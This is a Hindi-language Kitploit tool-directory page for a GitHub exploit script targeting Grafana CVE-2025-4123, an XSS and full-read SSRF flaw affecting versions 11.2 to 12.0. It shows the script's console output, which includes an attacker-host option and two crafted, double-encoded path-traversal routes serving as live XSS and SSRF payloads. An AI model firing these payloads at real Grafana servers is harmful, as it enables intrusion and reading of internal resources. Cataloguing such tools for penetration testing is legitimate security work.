Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4123 — Grafana CVE-2025-4123 का शोषण करने के लिए स्क्रिप्ट: XSS और Full-Read SSRF | Kitploit
उपकरण/GitHubGitHub/nightbloodz/cve-2025-4123
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnightbloodz/cve-2025-4123

CVE-2025-4123

Grafana CVE-2025-4123 का शोषण करने के लिए स्क्रिप्ट: XSS और Full-Read SSRF

रिपॉजिटरी देखें
57101 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Grafana CVE-2025-4123 एक्सप्लॉइट

CVE आईडी: CVE-2025-4123

गंभीरता: उच्च

प्रभाव: सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF), क्रॉस-साइट स्क्रिप्टिंग

प्रभावित संस्करण: Grafana 11.2, Grafana 11.3, Grafana 11.4, Grafana 11.5, Grafana 11.6, Grafana 12.0

पूरा लेख लेख

root@kitploit:~
❯ sudo python server.py --host http://127.0.0.1

[+] Using attacker host: http://127.0.0.1

[+] XSS Route: /a/..%2f..%2f..%2fpublic%2f..%252f%255C127.0.0.1%252f%253Fp%252f..%252f..%23/explore
[+] SSRF Route: /render/public/..%252f%5Chttp://127.0.0.1%252f%3F%252f..%252f..

 * Serving Flask app 'server'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:80
 * Running on http://192.168.100.2:80
Press CTRL+C to quit
टूल डाउनलोड करें